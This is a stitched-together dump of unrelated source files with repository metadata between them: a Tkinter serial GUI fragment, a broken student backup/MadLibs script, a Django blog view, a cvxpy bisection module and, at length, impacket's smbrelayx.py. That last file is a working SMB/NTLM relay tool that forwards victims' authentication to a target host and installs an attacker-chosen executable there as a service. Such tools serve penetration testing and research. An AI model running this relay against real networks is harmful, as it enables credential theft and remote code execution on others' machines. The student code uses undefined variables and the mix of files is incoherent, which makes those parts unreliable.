canvas.coords('pad3emptyrect',x,.05*WINDOW+.25*WINDOW*padnumber,.9*WINDOW,.2*WINDOW+.25*WINDOW*padnumber)
elif (padnumber == 3):
canvas.itemconfigure("pad4text",text="%.1f"%filt)
canvas.coords('pad4fillrect',.2*WINDOW,.05*WINDOW+.25*WINDOW*padnumber,x,.2*WINDOW+.25*WINDOW*padnumber)
canvas.coords('pad4emptyrect',x,.05*WINDOW+.25*WINDOW*padnumber,.9*WINDOW,.2*WINDOW+.25*WINDOW*padnumber)
canvas.update()
parent.after_idle(idle,parent,canvas)
#
# check command line arguments
#
if (len(sys.argv) != 2):
print "command line: hello.txrx.44.py serial_port"
sys.exit()
port = sys.argv[1]
#
# open serial port
#
ser = serial.Serial(port,115200)
ser.setDTR()
#
# set up GUI
#
root = Tk()
root.title('hello.txrx.44.py (q to exit)')
root.bind('q','exit')
canvas = Canvas(root, width=WINDOW, height=WINDOW, background='white')
#
canvas.create_text(.1*WINDOW,.125*WINDOW+.125*WINDOW*0,text="1",font=("Helvetica", 24),tags="pad1text",fill="black")
canvas.create_rectangle(.2*WINDOW,.05*WINDOW+.25*WINDOW*0,.3*WINDOW,.2*WINDOW+.25*WINDOW*0, tags='pad1fillrect', fill='red')
canvas.create_rectangle(.3*WINDOW,.05*WINDOW,.9*WINDOW,.2*WINDOW, tags='pad1emptyrect', fill='white')
canvas.create_text(.1*WINDOW,.125*WINDOW+.125*WINDOW*2*1,text="1",font=("Helvetica", 24),tags="pad2text",fill="black")
canvas.create_rectangle(.2*WINDOW,.05*WINDOW+.25*WINDOW*1,.3*WINDOW,.2*WINDOW+.25*WINDOW*1, tags='pad2fillrect', fill='yellow')
canvas.create_rectangle(.3*WINDOW,.05*WINDOW+.25*WINDOW*1,.9*WINDOW,.2*WINDOW+.25*WINDOW*1, tags='pad2emptyrect', fill='white')
canvas.create_text(.1*WINDOW,.125*WINDOW+.125*WINDOW*2*2,text="1",font=("Helvetica", 24),tags="pad3text",fill="black")
canvas.create_rectangle(.2*WINDOW,.05*WINDOW+.25*WINDOW*2,.3*WINDOW,.2*WINDOW+.25*WINDOW*2, tags='pad3fillrect', fill='grey')
canvas.create_rectangle(.3*WINDOW,.05*WINDOW+.25*WINDOW*2,.9*WINDOW,.2*WINDOW+.25*WINDOW*2, tags='pad3emptyrect', fill='white')
canvas.create_text(.1*WINDOW,.125*WINDOW+.125*WINDOW*2*3,text="1",font=("Helvetica", 24),tags="pad4text",fill="black")
canvas.create_rectangle(.2*WINDOW,.05*WINDOW+.25*WINDOW*3,.3*WINDOW,.2*WINDOW+.25*WINDOW*3, tags='pad4fillrect', fill='black')
canvas.create_rectangle(.3*WINDOW,.05*WINDOW+.25*WINDOW*3,.9*WINDOW,.2*WINDOW+.25*WINDOW*3, tags='pad4emptyrect', fill='white')
canvas.pack()
#
# start idle loop
#
root.after(100,idle,root,canvas)
root.mainloop()
| [
"satyam@satyam.com.ar"
] | satyam@satyam.com.ar |
e11205a6a6b5e106d13cbcda6cdc849cb0b70787 | a0e3f2840b2026a775ed0494b79938aa81567531 | /Programming Assignment 4/LaurenRobbenAssignment4 copy.py | 965edf08a7ba0a44126c8377e050cdb4c0c27b65 | [] | no_license | larobben13/Lauren-Robben-Portfolio | d944ec5dfb690f6ce25a929cccfbbb9c687c395d | ef6ea371c4cd3d4195998106cb0c758ade331f05 | refs/heads/main | 2023-07-27T16:56:32.903994 | 2021-09-16T22:41:22 | 2021-09-16T22:41:22 | 407,331,992 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,031 | py | #INF360 - Programming in Python
#Lauren Robben
#Assignment 4
import zipfile, os
def backupToZip(folder):
# Back up the entire contents of "folder" into a ZIP file.
folder = os.path.abspath(folder) # make sure folder is absolute
# Figure out the filename this code should use based on
# what files already exist.
number = 1
while True:
zipFilename = os.path.basename(folder) + '_' + str(number) + '.zip'
if not os.path.exists(zipFilename):
break
number = number + 1
#Create the ZIP file.
#Walk the entire folder tree and compress the files in each folder.
print('Done.')
#Create the ZIP file.
print(f'Creating{zipLaurenRobbenAssignment4}...')
backupZip = zipfile.ZipFile(zipLaurenRobbenAssignment4, 'w')
# TODO: Walk the entire folder tree and compress the files in each folder.
print('Done.')
#Walk the entire folder tree and compress the files in each folder.
for foldername, subfolders, filenames in os.walk(folder):
print(f'Adding files in {Assignment4}...')
# Add the current folder to the ZIP file.
backupZip.write(Assignment4)
# Add all the files in this folder to the ZIP file.
for filename in filenames:
newBase = os.path.basename(folder) + '_'
if filename.startswith(newBase) and filename.endswith('.zip'):
continue # don't back up the backup ZIP files
backupZip.write(os.path.join(Assignment4, LaurenRobbenAssignment4))
backupZip.close()
print('Done.')
#MadLibs Game
#Questions Go Here
noun1 = input('Enter a noun:')
adj1 = input('Enter an adjective:')
adverb1 = input('Enter an adverb:')
verb1 = input('Enter a verb:')
noun2 = input('Enter another noun:')
adj2 = input('Enter another adjective:')
adverb2 = input('Enter another adverb:')
verb2 = input('Enter another verb:')
#MadLib prints out below
print('There are many ' + adj1 + ' ways to choose a/an ' + noun1 + 'to swim.')
print(
| [
"noreply@github.com"
] | larobben13.noreply@github.com |
cedcaeb32f08859d744bbb1b09d963ff22ad58b7 | 25f9007e328a83238987be4651e2543ef052ef36 | /Blog/views.py | 399f278e87142aeaf0df64c999abf359590ebaae | [] | no_license | billd100/HexCollect | a7cf151887e345792fdf80e460728feaec6109ca | 7a3445ecbcb600a2853a437c2ced7b4eddc7816c | refs/heads/master | 2021-03-16T03:27:17.816425 | 2017-08-28T00:51:29 | 2017-08-28T00:51:29 | 91,523,241 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 434 | py | from django.shortcuts import render, get_object_or_404
from Blog.models import BlogPost
def blog(request):
recent_posts = BlogPost.objects.order_by('-pub_date')[:3]
context = {
'recent_posts': recent_posts,
}
return render(request, 'Blog/blog.html', context)
def blog_post(request, slug=None):
blog_post = get_object_or_404(BlogPost, slug=slug)
return render(request, 'Blog/blog_post.html', {'blog_post': blog_post})
| [
"williamdavisi777@gmail.com"
] | williamdavisi777@gmail.com |
5397186e66c797d3884c21346086536eb6c49005 | 59d18dc2b539d46e32c07b3c5b5cbeb16beda4d1 | /impacket/examples/smbrelayx/smbrelayx.py | 0afcb5bf01206e48396e5437a701d2d69a08f473 | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference",
"Apache-1.1",
"BSD-2-Clause"
] | permissive | Aliced3645/DataCenterMarketing | 9cbb0e429a8053af180172f5da69cb37a99c49be | 67bc485e73cf538498a89b28465afb822717affb | refs/heads/master | 2016-08-04T22:23:23.952571 | 2013-05-07T02:50:47 | 2013-05-07T02:50:47 | 8,640,330 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 22,417 | py | #!/usr/bin/python
# Copyright (c) 2012 CORE Security Technologies
#
# This software is provided under under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# $Id: smbrelayx.py 607 2012-07-14 23:53:54Z bethus@gmail.com $
#
# SMB Relay Module
#
# Author:
# Alberto Solino
#
# Description:
# This module performs the SMB Relay attacks originally discovered by cDc. It receives a
# list of targets and for every connection received it will choose the next target and try to relay the
# credentials. Also, if specified, it will first to try authenticate against the client connecting to us.
#
# It is implemented by invoking the smbserver, hooking to a few functions and then using the smbclient
# portion. It is supposed to be working on any LM Compatibility level. The only way to stop this attack
# is to enforce on the server SPN checks and or signing.
#
# If the authentication against the targets succeed, the client authentication success as well and
# a valid connection is set against the local smbserver. It's up to the user to set up the local
# smbserver functionality. One option is to set up shares with whatever files you want to the victim
# thinks it's connected to a valid SMB server. All that is done through the smb.conf file.
#
import socket
import string
import sys
import types
import os
import random
import time
import argparse
from impacket import smbserver, smb, ntlm, dcerpc, version
from impacket.dcerpc import dcerpc, transport, srvsvc, svcctl
from impacket.examples import serviceinstall
from smb import *
from smbserver import *
from threading import Thread
class doAttack(Thread):
def __init__(self, SMBClient, exeFile):
Thread.__init__(self)
self.installService = serviceinstall.ServiceInstall(SMBClient, exeFile)
def run(self):
# Here PUT YOUR CODE!
# First of all check whether we're Guest in the target system.
# If so, we're screwed.
self.installService.install()
print "[*] Service Installed.. CONNECT!"
self.installService.uninstall()
class SMBClient(smb.SMB):
def __init__(self, remote_name, extended_security = True, sess_port = 445):
self._extendedSecurity = extended_security
smb.SMB.__init__(self,remote_name, remote_name, sess_port = sess_port)
def neg_session(self):
return smb.SMB.neg_session(self, extended_security = self._extendedSecurity)
def setUid(self,uid):
self._uid = uid
def login_standard(self, user, domain, ansiPwd, unicodePwd):
smb = NewSMBPacket()
smb['Flags1'] = 8
sessionSetup = SMBCommand(SMB.SMB_COM_SESSION_SETUP_ANDX)
sessionSetup['Parameters'] = SMBSessionSetupAndX_Parameters()
sessionSetup['Data'] = SMBSessionSetupAndX_Data()
sessionSetup['Parameters']['MaxBuffer'] = 65535
sessionSetup['Parameters']['MaxMpxCount'] = 2
sessionSetup['Parameters']['VCNumber'] = os.getpid()
sessionSetup['Parameters']['SessionKey'] = self._dialects_parameters['SessionKey']
sessionSetup['Parameters']['AnsiPwdLength'] = len(ansiPwd)
sessionSetup['Parameters']['UnicodePwdLength'] = len(unicodePwd)
sessionSetup['Parameters']['Capabilities'] = SMB.CAP_RAW_MODE
sessionSetup['Data']['AnsiPwd'] = ansiPwd
sessionSetup['Data']['UnicodePwd'] = unicodePwd
sessionSetup['Data']['Account'] = str(user)
sessionSetup['Data']['PrimaryDomain'] = str(domain)
sessionSetup['Data']['NativeOS'] = 'Unix'
sessionSetup['Data']['NativeLanMan'] = 'Samba'
smb.addCommand(sessionSetup)
self.sendSMB(smb)
smb = self.recvSMB()
try:
smb.isValidAnswer(SMB.SMB_COM_SESSION_SETUP_ANDX)
except:
print "[!] Error login_standard"
return None, STATUS_LOGON_FAILURE
else:
self._uid = smb['Uid']
return smb, STATUS_SUCCESS
def sendAuth(self, authenticateMessageBlob):
smb = NewSMBPacket()
smb['Flags1'] = SMB.FLAGS1_PATHCASELESS
smb['Flags2'] = SMB.FLAGS2_EXTENDED_SECURITY
# Are we required to sign SMB? If so we do it, if not we skip it
if self._SignatureRequired:
smb['Flags2'] |= SMB.FLAGS2_SMB_SECURITY_SIGNATURE
smb['Uid'] = self._uid
sessionSetup = SMBCommand(SMB.SMB_COM_SESSION_SETUP_ANDX)
sessionSetup['Parameters'] = SMBSessionSetupAndX_Extended_Parameters()
sessionSetup['Data'] = SMBSessionSetupAndX_Extended_Data()
sessionSetup['Parameters']['MaxBufferSize'] = 65535
sessionSetup['Parameters']['MaxMpxCount'] = 2
sessionSetup['Parameters']['VcNumber'] = 1
sessionSetup['Parameters']['SessionKey'] = 0
sessionSetup['Parameters']['Capabilities'] = SMB.CAP_EXTENDED_SECURITY | SMB.CAP_USE_NT_ERRORS | SMB.CAP_UNICODE
# Fake Data here, don't want to get us fingerprinted
sessionSetup['Data']['NativeOS'] = 'Unix'
sessionSetup['Data']['NativeLanMan'] = 'Samba'
sessionSetup['Parameters']['SecurityBlobLength'] = len(authenticateMessageBlob)
sessionSetup['Data']['SecurityBlob'] = str(authenticateMessageBlob)
smb.addCommand(sessionSetup)
self.sendSMB(smb)
smb = self.recvSMB()
errorCode = smb['ErrorCode'] << 16
errorCode += smb['_reserved'] << 8
errorCode += smb['ErrorClass']
return smb, errorCode
def sendNegotiate(self, negotiateMessage):
smb = NewSMBPacket()
smb['Flags1'] = SMB.FLAGS1_PATHCASELESS
smb['Flags2'] = SMB.FLAGS2_EXTENDED_SECURITY
# Are we required to sign SMB? If so we do it, if not we skip it
if self._SignatureRequired:
smb['Flags2'] |= SMB.FLAGS2_SMB_SECURITY_SIGNATURE
sessionSetup = SMBCommand(SMB.SMB_COM_SESSION_SETUP_ANDX)
sessionSetup['Parameters'] = SMBSessionSetupAndX_Extended_Parameters()
sessionSetup['Data'] = SMBSessionSetupAndX_Extended_Data()
sessionSetup['Parameters']['MaxBufferSize'] = 65535
sessionSetup['Parameters']['MaxMpxCount'] = 2
sessionSetup['Parameters']['VcNumber'] = 1
sessionSetup['Parameters']['SessionKey'] = 0
sessionSetup['Parameters']['Capabilities'] = SMB.CAP_EXTENDED_SECURITY | SMB.CAP_USE_NT_ERRORS | SMB.CAP_UNICODE
# Let's build a NegTokenInit with the NTLMSSP
# TODO: In the future we should be able to choose different providers
blob = SPNEGO_NegTokenInit()
# NTLMSSP
blob['MechTypes'] = [TypesMech['NTLMSSP - Microsoft NTLM Security Support Provider']]
blob['MechToken'] = str(negotiateMessage)
sessionSetup['Parameters']['SecurityBlobLength'] = len(blob)
sessionSetup['Parameters'].getData()
sessionSetup['Data']['SecurityBlob'] = blob.getData()
# Fake Data here, don't want to get us fingerprinted
sessionSetup['Data']['NativeOS'] = 'Unix'
sessionSetup['Data']['NativeLanMan'] = 'Samba'
smb.addCommand(sessionSetup)
self.sendSMB(smb)
smb = self.recvSMB()
try:
smb.isValidAnswer(SMB.SMB_COM_SESSION_SETUP_ANDX)
except:
print "[!] SessionSetup Error!"
return None
else:
# We will need to use this uid field for all future requests/responses
self._uid = smb['Uid']
# Now we have to extract the blob to continue the auth process
sessionResponse = SMBCommand(smb['Data'][0])
sessionParameters = SMBSessionSetupAndX_Extended_Response_Parameters(sessionResponse['Parameters'])
sessionData = SMBSessionSetupAndX_Extended_Response_Data(flags = smb['Flags2'])
sessionData['SecurityBlobLength'] = sessionParameters['SecurityBlobLength']
sessionData.fromString(sessionResponse['Data'])
respToken = SPNEGO_NegTokenResp(sessionData['SecurityBlob'])
return respToken['ResponseToken']
class SMBRelayServer:
def __init__(self):
self.server = 0
self.target = ''
self.mode = 'REFLECTION'
self.server = smbserver.SMBSERVER(('0.0.0.0',445))
self.server.processConfigFile('smb.conf')
self.origSmbComNegotiate = self.server.hookSmbCommand(smb.SMB.SMB_COM_NEGOTIATE, self.SmbComNegotiate)
self.origSmbSessionSetupAndX = self.server.hookSmbCommand(smb.SMB.SMB_COM_SESSION_SETUP_ANDX, self.SmbSessionSetupAndX)
# Let's use the SMBServer Connection dictionary to keep track of our client connections as well
self.server.addConnection('SMBRelay', '0.0.0.0', 445)
def SmbComNegotiate(self, connId, smbServer, SMBCommand, recvPacket):
connData = smbServer.getConnectionData(connId, checkStatus = False)
if self.mode.upper() == 'REFLECTION':
self.target = connData['ClientIP']
#############################################################
# SMBRelay
smbData = smbServer.getConnectionData('SMBRelay', False)
if smbData.has_key(self.target):
# won't work until we have IPC on smbserver (if runs as ForkMixIn)
print "[!] %s has already a connection in progress" % self.target
else:
print "[*] Received connection from %s, attacking target %s" % (connData['ClientIP'] ,self.target)
try:
if recvPacket['Flags2'] & smb.SMB.FLAGS2_EXTENDED_SECURITY == 0:
extSec = False
else:
extSec = True
client = SMBClient(self.target, extended_security = extSec)
client.set_timeout(60)
except Exception, e:
print "[!] Connection against target %s FAILED" % self.target
print e
else:
encryptionKey = client.get_encryption_key()
smbData[self.target] = {}
smbData[self.target]['SMBClient'] = client
if encryptionKey is not None:
connData['EncryptionKey'] = encryptionKey
smbServer.setConnectionData('SMBRelay', smbData)
smbServer.setConnectionData(connId, connData)
return self.origSmbComNegotiate(connId, smbServer, SMBCommand, recvPacket)
#############################################################
def SmbSessionSetupAndX(self, connId, smbServer, SMBCommand, recvPacket):
connData = smbServer.getConnectionData(connId, checkStatus = False)
#############################################################
# SMBRelay
smbData = smbServer.getConnectionData('SMBRelay', False)
#############################################################
respSMBCommand = smb.SMBCommand(smb.SMB.SMB_COM_SESSION_SETUP_ANDX)
if connData['_dialects_parameters']['Capabilities'] & smb.SMB.CAP_EXTENDED_SECURITY:
# Extended security. Here we deal with all SPNEGO stuff
respParameters = smb.SMBSessionSetupAndX_Extended_Response_Parameters()
respData = smb.SMBSessionSetupAndX_Extended_Response_Data()
sessionSetupParameters = smb.SMBSessionSetupAndX_Extended_Parameters(SMBCommand['Parameters'])
sessionSetupData = smb.SMBSessionSetupAndX_Extended_Data()
sessionSetupData['SecurityBlobLength'] = sessionSetupParameters['SecurityBlobLength']
sessionSetupData.fromString(SMBCommand['Data'])
connData['Capabilities'] = sessionSetupParameters['Capabilities']
if struct.unpack('B',sessionSetupData['SecurityBlob'][0])[0] != smb.ASN1_AID:
# If there no GSSAPI ID, it must be an AUTH packet
blob = smb.SPNEGO_NegTokenResp(sessionSetupData['SecurityBlob'])
token = blob['ResponseToken']
else:
# NEGOTIATE packet
blob = smb.SPNEGO_NegTokenInit(sessionSetupData['SecurityBlob'])
token = blob['MechToken']
# Here we only handle NTLMSSP, depending on what stage of the
# authentication we are, we act on it
messageType = struct.unpack('<L',token[len('NTLMSSP\x00'):len('NTLMSSP\x00')+4])[0]
if messageType == 0x01:
# NEGOTIATE_MESSAGE
negotiateMessage = ntlm.NTLMAuthNegotiate()
negotiateMessage.fromString(token)
# Let's store it in the connection data
connData['NEGOTIATE_MESSAGE'] = negotiateMessage
#############################################################
# SMBRelay: Ok.. So we got a NEGOTIATE_MESSAGE from a client.
# Let's send it to the target server and send the answer back to the client.
smbClient = smbData[self.target]['SMBClient']
clientChallengeMessage = smbClient.sendNegotiate(token)
challengeMessage = ntlm.NTLMAuthChallenge()
challengeMessage.fromString(clientChallengeMessage)
#############################################################
respToken = smb.SPNEGO_NegTokenResp()
# accept-incomplete. We want more data
respToken['NegResult'] = '\x01'
respToken['SupportedMech'] = smb.TypesMech['NTLMSSP - Microsoft NTLM Security Support Provider']
respToken['ResponseToken'] = str(challengeMessage)
# Setting the packet to STATUS_MORE_PROCESSING
errorCode = STATUS_MORE_PROCESSING_REQUIRED
# Let's set up an UID for this connection and store it
# in the connection's data
# Picking a fixed value
# TODO: Manage more UIDs for the same session
connData['Uid'] = 10
# Let's store it in the connection data
connData['CHALLENGE_MESSAGE'] = challengeMessage
elif messageType == 0x03:
# AUTHENTICATE_MESSAGE, here we deal with authentication
authenticateMessage = ntlm.NTLMAuthChallengeResponse()
authenticateMessage.fromString(token)
#############################################################
# SMBRelay: Ok, so now the have the Auth token, let's send it
# back to the target system and hope for the best.
smbClient = smbData[self.target]['SMBClient']
authData = sessionSetupData['SecurityBlob']
clientResponse, errorCode = smbClient.sendAuth(sessionSetupData['SecurityBlob'])
authenticateMessage = ntlm.NTLMAuthChallengeResponse()
authenticateMessage.fromString(token)
if errorCode != STATUS_SUCCESS:
# Let's return what the target returned, hope the client connects back again
packet = smb.NewSMBPacket()
packet['Flags1'] = smb.SMB.FLAGS1_REPLY | smb.SMB.FLAGS1_PATHCASELESS
packet['Flags2'] = smb.SMB.FLAGS2_NT_STATUS | SMB.FLAGS2_EXTENDED_SECURITY
packet['Command'] = recvPacket['Command']
packet['Pid'] = recvPacket['Pid']
packet['Tid'] = recvPacket['Tid']
packet['Mid'] = recvPacket['Mid']
packet['Uid'] = recvPacket['Uid']
packet['Data'] = '\x00\x00\x00'
packet['ErrorCode'] = errorCode >> 16
packet['ErrorClass'] = errorCode & 0xff
# Reset the UID
smbClient.setUid(0)
print "[!] Authenticating against %s as %s\%s FAILED" % (connData['ClientIP'],authenticateMessage['domain_name'], authenticateMessage['user_name'])
del (smbData[self.target])
return None, [packet], errorCode
else:
# We have a session, create a thread and do whatever we want
print "[*] Authenticating against %s as %s\%s SUCCEED" % (connData['ClientIP'],authenticateMessage['domain_name'], authenticateMessage['user_name'])
del (smbData[self.target])
clientThread = doAttack(smbClient,self.exeFile)
clientThread.start()
# Now continue with the server
#############################################################
respToken = smb.SPNEGO_NegTokenResp()
# accept-completed
respToken['NegResult'] = '\x00'
# Status SUCCESS
errorCode = STATUS_SUCCESS
# Let's store it in the connection data
connData['AUTHENTICATE_MESSAGE'] = authenticateMessage
else:
raise("Unknown NTLMSSP MessageType %d" % messageType)
respParameters['SecurityBlobLength'] = len(respToken)
respData['SecurityBlobLength'] = respParameters['SecurityBlobLength']
respData['SecurityBlob'] = respToken.getData()
else:
# Process Standard Security
respParameters = smb.SMBSessionSetupAndXResponse_Parameters()
respData = smb.SMBSessionSetupAndXResponse_Data()
sessionSetupParameters = smb.SMBSessionSetupAndX_Parameters(SMBCommand['Parameters'])
sessionSetupData = smb.SMBSessionSetupAndX_Data()
sessionSetupData['AnsiPwdLength'] = sessionSetupParameters['AnsiPwdLength']
sessionSetupData['UnicodePwdLength'] = sessionSetupParameters['UnicodePwdLength']
sessionSetupData.fromString(SMBCommand['Data'])
connData['Capabilities'] = sessionSetupParameters['Capabilities']
#############################################################
# SMBRelay
smbClient = smbData[self.target]['SMBClient']
clientResponse, errorCode = smbClient.login_standard(sessionSetupData['Account'], sessionSetupData['PrimaryDomain'], sessionSetupData['AnsiPwd'], sessionSetupData['UnicodePwd'])
if errorCode != STATUS_SUCCESS:
# Let's return what the target returned, hope the client connects back again
packet = smb.NewSMBPacket()
packet['Flags1'] = smb.SMB.FLAGS1_REPLY | smb.SMB.FLAGS1_PATHCASELESS
packet['Flags2'] = smb.SMB.FLAGS2_NT_STATUS | SMB.FLAGS2_EXTENDED_SECURITY
packet['Command'] = recvPacket['Command']
packet['Pid'] = recvPacket['Pid']
packet['Tid'] = recvPacket['Tid']
packet['Mid'] = recvPacket['Mid']
packet['Uid'] = recvPacket['Uid']
packet['Data'] = '\x00\x00\x00'
packet['ErrorCode'] = errorCode >> 16
packet['ErrorClass'] = errorCode & 0xff
# Reset the UID
smbClient.setUid(0)
return None, [packet], errorCode
# Now continue with the server
else:
# We have a session, create a thread and do whatever we want
del (smbData[self.target])
clientThread = doAttack(smbClient,self.exeFile)
clientThread.start()
# Remove the target server from our connection list, the work is done
# Now continue with the server
#############################################################
# Do the verification here, for just now we grant access
# TODO: Manage more UIDs for the same session
errorCode = STATUS_SUCCESS
connData['Uid'] = 10
respParameters['Action'] = 0
respData['NativeOS'] = smbServer.getServerOS()
respData['NativeLanMan'] = smbServer.getServerOS()
respSMBCommand['Parameters'] = respParameters
respSMBCommand['Data'] = respData
# From now on, the client can ask for other commands
connData['Authenticated'] = True
#############################################################
# SMBRelay
smbServer.setConnectionData('SMBRelay', smbData)
#############################################################
smbServer.setConnectionData(connId, connData)
return [respSMBCommand], None, errorCode
def start(self):
self.server.serve_forever()
def setTargets(self, targets):
self.target = targets
def setExeFile(self, filename):
self.exeFile = filename
def setMode(self,mode):
self.mode = mode
# Process command-line arguments.
if __name__ == '__main__':
print version.BANNER
parser = argparse.ArgumentParser(add_help = False, description = "For every connection received, this module will try to SMB relay that connection to the target system or the original client")
parser.add_argument("--help", action="help", help='show this help message and exit')
parser.add_argument('-h', action='store', metavar = 'HOST', help='Host to relay the credentials to, if not it will relay it back to the client')
parser.add_argument('-e', action='store', required=True, metavar = 'FILE', help='File to execute on the target system')
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
try:
options = parser.parse_args()
except Exception, e:
print e
sys.exit(1)
print "[*] Setting up SMB Server"
if options.h is not None:
print "[*] Running in relay mode"
mode = 'RELAY'
targetSystem = options.h
else:
print "[*] Running in reflection mode"
targetSystem = None
mode = 'REFLECTION'
exeFile = options.e
s = SMBRelayServer()
s.setTargets(targetSystem)
s.setExeFile(exeFile)
s.setMode(mode)
print "[*] Starting server, waiting for connections"
s.start()
| [
"shu@shu-GE70-0NC.(none)"
] | shu@shu-GE70-0NC.(none) |
16118184ce048e27e0f2b4faebd78b93665c7384 | dbb48e3d1fa77ada72fee41bca2a991b102b5bb4 | /saas_vlc.py~ | 2032133f1d8645ac5ae6df6fce7f16e5c517a512 | [] | no_license | coolgourav147/OwnCloud | f16e80cec6ce2751bf2ecb389fe0cac1fd06a055 | f4797c84b041d15628757a8e276e05f35ed55f18 | refs/heads/master | 2021-01-09T06:38:36.345897 | 2016-05-27T16:54:59 | 2016-05-27T16:54:59 | 59,849,975 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 122 | #! /usr/bin/python
import os
os.system("yum install openssh-server -y")
os.system('ssh -X -l rohit1 192.168.0.29 vlc')
| [
"root@pagaltiger.in"
] | root@pagaltiger.in | |
73c5435838a5e04fd40ce61744fa821023bc53c3 | 149ab73e1002a0f65c988a79741167b78c7433e7 | /venv/lib/python3.8/site-packages/cvxpy/reductions/solvers/bisection.py | 6cc87bd3e76304694a4689c69013ad2599c35fcf | [] | no_license | davidtandoh/BabyInvestor-REST-API | f908984c3233cb30aea990563b9b813c21788113 | 2c69a1162aae9845d552b87410cd85597dfefe19 | refs/heads/main | 2023-01-03T13:46:37.373332 | 2020-10-29T11:20:30 | 2020-10-29T11:20:30 | 308,304,239 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,943 | py | """
Copyright, the CVXPY authors
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import cvxpy.settings as s
import cvxpy.error as error
import cvxpy.problems as problems
from cvxpy.problems.objective import Minimize
from cvxpy.reductions.solution import failure_solution
def _lower_problem(problem):
"""Evaluates lazy constraints."""
constrs = [c() if callable(c) else c for c in problem.constraints]
constrs = [c for c in constrs if c is not None]
if s.INFEASIBLE in constrs:
# Indicates that the problem is infeasible.
return None
return problems.problem.Problem(Minimize(0), constrs)
def _solve(problem, solver):
if problem is None:
return
problem.solve(solver=solver)
def _infeasible(problem):
return problem is None or problem.status in (s.INFEASIBLE,
s.INFEASIBLE_INACCURATE)
def _find_bisection_interval(problem, t, solver=None, low=None, high=None,
max_iters=100):
"""Finds an interval for bisection."""
if low is None:
low = 0 if t.is_nonneg() else -1
if high is None:
high = 0 if t.is_nonpos() else 1
infeasible_low = t.is_nonneg()
feasible_high = t.is_nonpos()
for _ in range(max_iters):
if not feasible_high:
t.value = high
lowered = _lower_problem(problem)
_solve(lowered, solver)
if _infeasible(lowered):
low = high
high *= 2
continue
elif lowered.status in s.SOLUTION_PRESENT:
feasible_high = True
else:
raise error.SolverError(
"Solver failed with status %s" % lowered.status)
if not infeasible_low:
t.value = low
lowered = _lower_problem(problem)
_solve(lowered, solver=solver)
if _infeasible(lowered):
infeasible_low = True
elif lowered.status in s.SOLUTION_PRESENT:
high = low
low *= 2
continue
else:
raise error.SolverError(
"Solver failed with status %s" % lowered.status)
if infeasible_low and feasible_high:
return low, high
raise error.SolverError("Unable to find suitable interval for bisection.")
def _bisect(problem, solver, t, low, high, tighten_lower, tighten_higher,
eps=1e-6, verbose=False, max_iters=100):
"""Bisect `problem` on the parameter `t`."""
verbose_freq = 5
soln = None
for i in range(max_iters):
assert low <= high
if soln is not None and (high - low) <= eps:
# the previous iteration might have been infeasible, but
# the tigthen* functions might have narrowed the interval
# to the optimal value in the previous iteration (hence the
# soln is not None check)
return soln, low, high
query_pt = (low + high) / 2.0
if verbose and i % verbose_freq == 0:
print(("(iteration %d) lower bound: %0.6f" % (i, low)))
print(("(iteration %d) upper bound: %0.6f" % (i, high)))
print(("(iteration %d) query point: %0.6f " % (i, query_pt)))
t.value = query_pt
lowered = _lower_problem(problem)
_solve(lowered, solver=solver)
if _infeasible(lowered):
if verbose and i % verbose_freq == 0:
print(("(iteration %d) query was infeasible.\n" % i))
low = tighten_lower(query_pt)
elif lowered.status in s.SOLUTION_PRESENT:
if verbose and i % verbose_freq == 0:
print(("(iteration %d) query was feasible. %s)\n" %
(i, lowered.solution)))
soln = lowered.solution
high = tighten_higher(query_pt)
else:
if verbose:
print("Aborting; the solver failed ...\n")
raise error.SolverError(
"Solver failed with status %s" % lowered.status)
raise error.SolverError("Max iters hit during bisection.")
def bisect(problem, solver=None, low=None, high=None, eps=1e-6, verbose=False,
max_iters=100, max_iters_interval_search=100):
"""Bisection on a one-parameter family of DCP problems.
Bisects on a one-parameter family of DCP problems emitted by `Dqcp2Dcp`.
Parameters
------
problem : Problem
problem emitted by Dqcp2Dcp
solver : Solver
solver to use for bisection
low : float
lower bound for bisection (optional)
high : float
upper bound for bisection (optional)
eps : float
terminate bisection when width of interval is < eps
verbose : bool
whether to print verbose output related to the bisection
max_iters : int
the maximum number of iterations to run bisection
Returns
-------
A Solution object.
"""
if not hasattr(problem, '_bisection_data'):
raise ValueError("`bisect` only accepts problems emitted by Dqcp2Dcp.")
feas_problem, t, tighten_lower, tighten_higher = problem._bisection_data
if verbose:
print(("\n******************************************************"
"**************************\n"
"Preparing to bisect problem\n\n%s\n" % _lower_problem(problem)))
lowered_feas = _lower_problem(feas_problem)
_solve(lowered_feas, solver)
if _infeasible(lowered_feas):
if verbose:
print("Problem is infeasible.")
return failure_solution(s.INFEASIBLE)
if low is None or high is None:
if verbose:
print("Finding interval for bisection ...")
low, high = _find_bisection_interval(problem, t, solver, low, high,
max_iters_interval_search)
if verbose:
print(("initial lower bound: %0.6f" % low))
print(("initial upper bound: %0.6f\n" % high))
soln, low, high = _bisect(
problem, solver, t, low, high, tighten_lower, tighten_higher,
eps, verbose, max_iters)
soln.opt_val = (low + high) / 2.0
if verbose:
print(("Bisection completed, with lower bound %0.6f and upper bound "
"%0.7f\n******************************************"
"**************************************\n"
% (low, high)))
return soln
| [
"davidtandoh@Davids-MacBook-Pro.local"
] | davidtandoh@Davids-MacBook-Pro.local |
658011629f392d7d437f228fd23adf37902a88a3 | 61551290cac20e3feafe2a83c9adbdabf2fd1d46 | /zfsbackup/runner/command.py | dfe0aeabb9ec76d9dfffc84a3cb136f1d3860d5c | [
"MIT"
